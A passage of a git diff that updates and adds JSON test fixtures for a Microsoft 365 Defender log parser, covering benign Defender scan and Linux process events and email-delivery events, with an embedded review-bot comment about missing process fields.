"working_directory": "/usr/sbin" + }, + "related": { + "hash": [ + "51a9cac9c4e8da44ffd7502be17604ee", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232", + "f1d50e0d3e0ba197baf152614e0cd94487a1142e" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "account" + ] + }, + "user": { + "domain": "domain", + "name": "account" + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events.json index 7d72e6264..5a90081c8 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_process_events.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events.json @@ -30,6 +30,7 @@ "InitiatingProcessVersionInfoProductVersion": "4.18.2301.6", "LogonId": "999", "ProcessIntegrityLevel": "System", + "ProcessTokenElevation": "TokenElevationTypeDefault", "ProcessVersionInfoCompanyName": "Microsoft Corporation", "ProcessVersionInfoFileDescription": "Microsoft Malware Protection Command Line Utility", "ProcessVersionInfoInternalFileName": "MpCmdRun", 
@@ -69,31 +70,33 @@ "54", "Scan" ], - "code_signature": { - "status": "Valid", - "subject_name": "OsVendor" - }, "command_line": "\"MpCmdRun.exe\" Scan -ScheduleJob -RestrictPrivileges -DailyScan -ScanTrigger 54", - "executable": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0\\msmpeng.exe", - "hash": { - "md5": "5d5608654828cf052ba013b3c37cbb61", - "sha1": "5bfbb0f965e2761d75a51faacc9db6a146a7c5ae", - "sha256": "52bd0a4d149f7913b9c3ba111eff1e75188abfcdc54b927390bc3bfad419860e" - }, - "name": "MsMpEng.exe", + "name": "MpCmdRun.exe", "parent": { - "name": "services.exe", - "pid": 1032, - "start": "2023-01-03T08:51:26.740241Z" + "code_signature": { + "status": "Valid", + "subject_name": "OsVendor" + }, + "command_line": "\"MsMpEng.exe\"", + "executable": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0\\msmpeng.exe", + "hash": { + "md5": "5d5608654828cf052ba013b3c37cbb61", + "sha1": "5bfbb0f965e2761d75a51faacc9db6a146a7c5ae", + "sha256": "52bd0a4d149f7913b9c3ba111eff1e75188abfcdc54b927390bc3bfad419860e" + }, + "name": "MsMpEng.exe", + "pid": 5456, + "start": "2023-01-03T08:51:29.269279Z", + "user": { + "domain": "NT", + "id": "S-1-1-11", + "name": "System" + }, + "working_directory": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0" }, "pid": 37788, "start": "2023-01-04T14:15:10.355033Z", - "user": { - "domain": "NT", - "id": "S-1-1-11", - "name": "System" - }, - "working_directory": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0" + "working_directory": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2301.6-0" }, "related": { "hash": [ diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json index d2e83b32a..9b0327128 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json 
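Review bot: On the new side the created process (`MpCmdRun.exe`) is left without `process.executable`, `process.hash.*` and `process.user`: the `process` object now goes straight from `command_line` to `name` to `parent`, and the only executable path, hashes and account that remain belong to the parent (`MsMpEng.exe`). A detection matching on `process.hash.sha256` or `process.user.name` therefore sees the initiating process instead of the spawned binary, which for a process-creation event is the one of interest. The `@@ -49,20 +55,23 @@` hunk of test_device_process_events_2.json has the same gap, and there the input message visibly carries `SHA1`, `SHA256`, `MD5`, `FolderPath` (`/usr/bin/ps`) and `AccountName`/`AccountDomain` for the created process while the expected `process` only gains `name` and `working_directory`. Unless the parser deliberately omits them, both expected blocks should pin `process.executable`, `process.hash` and `process.user` from those columns; the input for this file is outside the hunk, so I cannot confirm which of the columns it carries.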
+++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json 
@@ -1,6 +1,12 @@ { "input": { - "message": "{\"time\": \"2024-10-22T15:10:39.1954172Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceProcessEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:10:13.8421815Z\", \"properties\": {\"InitiatingProcessSHA1\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": \"\", \"InitiatingProcessParentFileName\": \"\", \"InitiatingProcessFolderPath\": null, \"InitiatingProcessCommandLine\": \"\", \"SHA1\": \"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\", \"FileSize\": 144632, \"MD5\": \"098f6bcd4621d373cade4e832627b4f6\", \"FolderPath\": \"/usr/bin/ps\", \"ProcessCommandLine\": \"/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers\", \"FileName\": \"ps\", \"ProcessId\": 423627, \"InitiatingProcessId\": 423627, \"ProcessCreationTime\": \"2024-10-22T15:09:44.594155Z\", \"DeviceName\": \"computer.intranet.example\", \"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:44.59Z\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"computer\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessSignatureStatus\": \"Unknown\", \"InitiatingProcessSignerType\": \"Unknown\", \"InitiatingProcessParentId\": 0, \"ReportId\": 67417, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"AccountDomain\": \"computer\", \"AccountName\": \"root\", \"ProcessTokenElevation\": \"None\", \"ProcessIntegrityLevel\": null, \"AccountSid\": null, \"AppGuardContainerId\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"InitiatingProcessSHA256\": null, \"InitiatingProcessLogonId\": 0, \"LogonId\": 0, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"AccountUpn\": null, 
\"AccountObjectId\": null, \"AdditionalFields\": \"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"InitiatingProcessPosixProcessGroupId\\\":423627,\\\"InitiatingProcessPosixSessionId\\\":180264,\\\"InitiatingProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"ProcessPosixProcessGroupId\\\":423627,\\\"ProcessPosixSessionId\\\":180264,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"PosixGroupId\\\":0}}\", \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, 
\"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"ProcessVersionInfoCompanyName\": null, \"ProcessVersionInfoProductName\": null, \"ProcessVersionInfoProductVersion\": null, \"ProcessVersionInfoInternalFileName\": null, \"ProcessVersionInfoOriginalFileName\": null, \"ProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"CreatedProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"ActionType\": \"ProcessCreated\", \"Timestamp\": \"2024-10-22T15:09:44.594155Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}" + "message": "{\"time\": \"2024-10-22T15:10:39.1954172Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceProcessEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:10:13.8421815Z\", \"properties\": {\"InitiatingProcessSHA1\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": \"\", \"InitiatingProcessParentFileName\": \"\", \"InitiatingProcessFolderPath\": null, \"InitiatingProcessCommandLine\": \"\", \"SHA1\": \"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\", \"FileSize\": 144632, \"MD5\": \"098f6bcd4621d373cade4e832627b4f6\", \"FolderPath\": \"/usr/bin/ps\", \"ProcessCommandLine\": \"/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers\", \"FileName\": \"ps\", \"ProcessId\": 423627, \"InitiatingProcessId\": 423627, \"ProcessCreationTime\": \"2024-10-22T15:09:44.594155Z\", \"DeviceName\": \"computer.intranet.example\", \"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:44.59Z\", 
\"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"computer\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessSignatureStatus\": \"Unknown\", \"InitiatingProcessSignerType\": \"Unknown\", \"InitiatingProcessParentId\": 0, \"ReportId\": 67417, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"AccountDomain\": \"computer\", \"AccountName\": \"root\", \"ProcessTokenElevation\": \"None\", \"ProcessIntegrityLevel\": null, \"AccountSid\": null, \"AppGuardContainerId\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"InitiatingProcessSHA256\": null, \"InitiatingProcessLogonId\": 0, \"LogonId\": 0, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"AccountUpn\": null, \"AccountObjectId\": null, \"AdditionalFields\": \"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"InitiatingProcessPosixProcessGroupId\\\":423627,\\\"InitiatingProcessPosixSessionId\\\":180264,\\\"InitiatingProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"ProcessPosixProcessGroupId\\\
":423627,\\\"ProcessPosixSessionId\\\":180264,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"PosixGroupId\\\":0}}\", \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"ProcessVersionInfoCompanyName\": null, \"ProcessVersionInfoProductName\": null, \"ProcessVersionInfoProductVersion\": null, \"ProcessVersionInfoInternalFileName\": null, \"ProcessVersionInfoOriginalFileName\": null, \"ProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"CreatedProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"ActionType\": \"ProcessCreated\", \"Timestamp\": \"2024-10-22T15:09:44.594155Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } }, "expected": { "message": "{\"time\": \"2024-10-22T15:10:39.1954172Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": 
\"Publish\", \"category\": \"AdvancedHunting-DeviceProcessEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:10:13.8421815Z\", \"properties\": {\"InitiatingProcessSHA1\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": \"\", \"InitiatingProcessParentFileName\": \"\", \"InitiatingProcessFolderPath\": null, \"InitiatingProcessCommandLine\": \"\", \"SHA1\": \"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\", \"FileSize\": 144632, \"MD5\": \"098f6bcd4621d373cade4e832627b4f6\", \"FolderPath\": \"/usr/bin/ps\", \"ProcessCommandLine\": \"/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers\", \"FileName\": \"ps\", \"ProcessId\": 423627, \"InitiatingProcessId\": 423627, \"ProcessCreationTime\": \"2024-10-22T15:09:44.594155Z\", \"DeviceName\": \"computer.intranet.example\", \"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:44.59Z\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"computer\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessSignatureStatus\": \"Unknown\", \"InitiatingProcessSignerType\": \"Unknown\", \"InitiatingProcessParentId\": 0, \"ReportId\": 67417, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"AccountDomain\": \"computer\", \"AccountName\": \"root\", \"ProcessTokenElevation\": \"None\", \"ProcessIntegrityLevel\": null, \"AccountSid\": null, \"AppGuardContainerId\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"InitiatingProcessSHA256\": null, \"InitiatingProcessLogonId\": 0, \"LogonId\": 0, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"AccountUpn\": null, \"AccountObjectId\": null, \"AdditionalFields\": 
\"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"InitiatingProcessPosixProcessGroupId\\\":423627,\\\"InitiatingProcessPosixSessionId\\\":180264,\\\"InitiatingProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"ProcessPosixProcessGroupId\\\":423627,\\\"ProcessPosixSessionId\\\":180264,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"PosixGroupId\\\":0}}\", \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, 
\"InitiatingProcessVersionInfoFileDescription\": null, \"ProcessVersionInfoCompanyName\": null, \"ProcessVersionInfoProductName\": null, \"ProcessVersionInfoProductVersion\": null, \"ProcessVersionInfoInternalFileName\": null, \"ProcessVersionInfoOriginalFileName\": null, \"ProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"CreatedProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"ActionType\": \"ProcessCreated\", \"Timestamp\": \"2024-10-22T15:09:44.594155Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", @@ -49,20 +55,23 @@ "-o", "comm,pid,pcpu,pmem,rss,etimes" ], - "code_signature": { - "status": "Unknown", - "subject_name": "Unknown" - }, "command_line": "/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers", + "name": "ps", "parent": { - "pid": 0 + "code_signature": { + "status": "Unknown", + "subject_name": "Unknown" + }, + "pid": 423627, + "start": "2024-10-22T15:09:44.590000Z", + "user": { + "domain": "computer", + "name": "root" + } }, "pid": 423627, "start": "2024-10-22T15:09:44.594155Z", - "user": { - "domain": "computer", - "name": "root" - } + "working_directory": "/usr/bin" }, "related": { "hash": [ diff --git a/Microsoft/microsoft-365-defender/tests/test_email_delivered.json b/Microsoft/microsoft-365-defender/tests/test_email_delivered.json new file mode 100644 index 000000000..11ca88986 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_email_delivered.json 
@@ -0,0 +1,76 @@ +{ + "input": { + "message": "{\"time\":\"2024-10-28T14:31:34.1371671Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-EmailEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:18:40.3469550Z\",\"properties\":{\"ReportId\":\"12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c\",\"NetworkMessageId\":\"12345678-1234-abcd-ef90-abcdef123456\",\"InternetMessageId\":\"<1@eu-west-1.test.com>\",\"Timestamp\":\"2024-10-28T14:18:40Z\",\"EmailClusterId\":3162398878,\"SenderIPv4\":\"1.2.3.4\",\"SenderIPv6\":null,\"SenderMailFromAddress\":\"john.doe@company.com\",\"SenderFromAddress\":\"john.doe@company.com\",\"SenderMailFromDomain\":\"company.com\",\"SenderFromDomain\":\"company.com\",\"RecipientEmailAddress\":\"alan.smithee@company.com\",\"Subject\":\"MAIL subject\",\"EmailDirection\":\"Inbound\",\"DeliveryAction\":\"Delivered\",\"DeliveryLocation\":\"Inbox/folder\",\"EmailAction\":null,\"EmailActionPolicy\":null,\"EmailActionPolicyGuid\":null,\"AttachmentCount\":0,\"UrlCount\":0,\"EmailLanguage\":\"en\",\"RecipientObjectId\":\"abcd1234-abcd-1234-ef90-123456abcdef\",\"SenderObjectId\":null,\"SenderDisplayName\":null,\"ThreatNames\":null,\"ThreatTypes\":null,\"DetectionMethods\":null,\"Connectors\":\"Relai SMTP interne\",\"OrgLevelAction\":\"Allow\",\"OrgLevelPolicy\":\"Connection policy\",\"UserLevelAction\":null,\"UserLevelPolicy\":null,\"ConfidenceLevel\":null,\"AdditionalFields\":null,\"AuthenticationDetails\":\"{\\\"SPF\\\":\\\"pass\\\",\\\"DKIM\\\":\\\"none\\\",\\\"DMARC\\\":\\\"pass\\\"}\",\"BulkComplaintLevel\":null},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": 
"{\"time\":\"2024-10-28T14:31:34.1371671Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-EmailEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:18:40.3469550Z\",\"properties\":{\"ReportId\":\"12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c\",\"NetworkMessageId\":\"12345678-1234-abcd-ef90-abcdef123456\",\"InternetMessageId\":\"<1@eu-west-1.test.com>\",\"Timestamp\":\"2024-10-28T14:18:40Z\",\"EmailClusterId\":3162398878,\"SenderIPv4\":\"1.2.3.4\",\"SenderIPv6\":null,\"SenderMailFromAddress\":\"john.doe@company.com\",\"SenderFromAddress\":\"john.doe@company.com\",\"SenderMailFromDomain\":\"company.com\",\"SenderFromDomain\":\"company.com\",\"RecipientEmailAddress\":\"alan.smithee@company.com\",\"Subject\":\"MAIL subject\",\"EmailDirection\":\"Inbound\",\"DeliveryAction\":\"Delivered\",\"DeliveryLocation\":\"Inbox/folder\",\"EmailAction\":null,\"EmailActionPolicy\":null,\"EmailActionPolicyGuid\":null,\"AttachmentCount\":0,\"UrlCount\":0,\"EmailLanguage\":\"en\",\"RecipientObjectId\":\"abcd1234-abcd-1234-ef90-123456abcdef\",\"SenderObjectId\":null,\"SenderDisplayName\":null,\"ThreatNames\":null,\"ThreatTypes\":null,\"DetectionMethods\":null,\"Connectors\":\"Relai SMTP interne\",\"OrgLevelAction\":\"Allow\",\"OrgLevelPolicy\":\"Connection policy\",\"UserLevelAction\":null,\"UserLevelPolicy\":null,\"ConfidenceLevel\":null,\"AdditionalFields\":null,\"AuthenticationDetails\":\"{\\\"SPF\\\":\\\"pass\\\",\\\"DKIM\\\":\\\"none\\\",\\\"DMARC\\\":\\\"pass\\\"}\",\"BulkComplaintLevel\":null},\"Tenant\":\"DefaultTenant\"}", + "event": { + "action": "Delivered", + "category": [ + "connection", + "email" + ], + "dataset": "email_events", + "type": [ + "allowed", + "info" + ] + }, + "@timestamp": "2024-10-28T14:18:40Z", + "action": { + "properties": { + "AttachmentCount": 0, + "AuthenticationDetails": "{\"DKIM\": \"none\", \"DMARC\": \"pass\", \"SPF\": \"pass\"}", + "Connectors": "Relai SMTP interne", + 
"DeliveryAction": "Delivered", + "DeliveryLocation": "Inbox/folder", + "EmailClusterId": "3162398878", + "EmailDirection": "Inbound", + "EmailLanguage": "en", + "OrgLevelAction": "Allow", + "OrgLevelPolicy": "Connection policy", + "RecipientObjectId": "abcd1234-abcd-1234-ef90-123456abcdef", + "SenderFromDomain": "company.com", + "UrlCount": 0 + } + }, + "email": { + "direction": "inbound", + "from": { + "address": [ + "john.doe@company.com" + ] + }, + "local_id": "12345678-1234-abcd-ef90-abcdef123456", + "message_id": "<1@eu-west-1.test.com>", + "subject": "MAIL subject", + "to": { + "address": [ + "alan.smithee@company.com" + ] + } + }, + "microsoft": { + "defender": { + "report": { + "id": "12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c" + } + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_email_delivered2.json b/Microsoft/microsoft-365-defender/tests/test_email_delivered2.json new file mode 100644 index 000000000..d3b7b8c2f --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_email_delivered2.json 
@@ -0,0 +1,76 @@ +{ + "input": { + "message": "{\"time\":\"2024-10-28T14:39:28.9769628Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-EmailEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:18:38.5006358Z\",\"properties\":{\"ReportId\":\"12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c\",\"NetworkMessageId\":\"12345678-1234-abcd-ef90-abcdef123456\",\"InternetMessageId\":\"<20241028141819.43623347A8F@test.fr>\",\"Timestamp\":\"2024-10-28T14:18:38Z\",\"EmailClusterId\":2633942188,\"SenderIPv4\":\"1.2.3.4\",\"SenderIPv6\":null,\"SenderMailFromAddress\":\"john.doe@test.fr\",\"SenderFromAddress\":\"john.doe@test.fr\",\"SenderMailFromDomain\":\"test.fr\",\"SenderFromDomain\":\"test.fr\",\"RecipientEmailAddress\":\"alan.smithee@test.fr\",\"Subject\":\"EMAIL Subject\",\"EmailDirection\":\"Inbound\",\"DeliveryAction\":\"Delivered\",\"DeliveryLocation\":\"Inbox/folder\",\"EmailAction\":null,\"EmailActionPolicy\":null,\"EmailActionPolicyGuid\":null,\"AttachmentCount\":0,\"UrlCount\":0,\"EmailLanguage\":\"en\",\"RecipientObjectId\":\"abcd1234-abcd-1234-ef90-123456abcdef\",\"SenderObjectId\":null,\"SenderDisplayName\":null,\"ThreatNames\":null,\"ThreatTypes\":null,\"DetectionMethods\":null,\"Connectors\":\"Relai SMTP interne\",\"OrgLevelAction\":\"Allow\",\"OrgLevelPolicy\":\"Connection policy\",\"UserLevelAction\":null,\"UserLevelPolicy\":null,\"ConfidenceLevel\":null,\"AdditionalFields\":null,\"AuthenticationDetails\":\"{\\\"SPF\\\":\\\"pass\\\",\\\"DKIM\\\":\\\"none\\\",\\\"DMARC\\\":\\\"pass\\\"}\",\"BulkComplaintLevel\":null},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": 
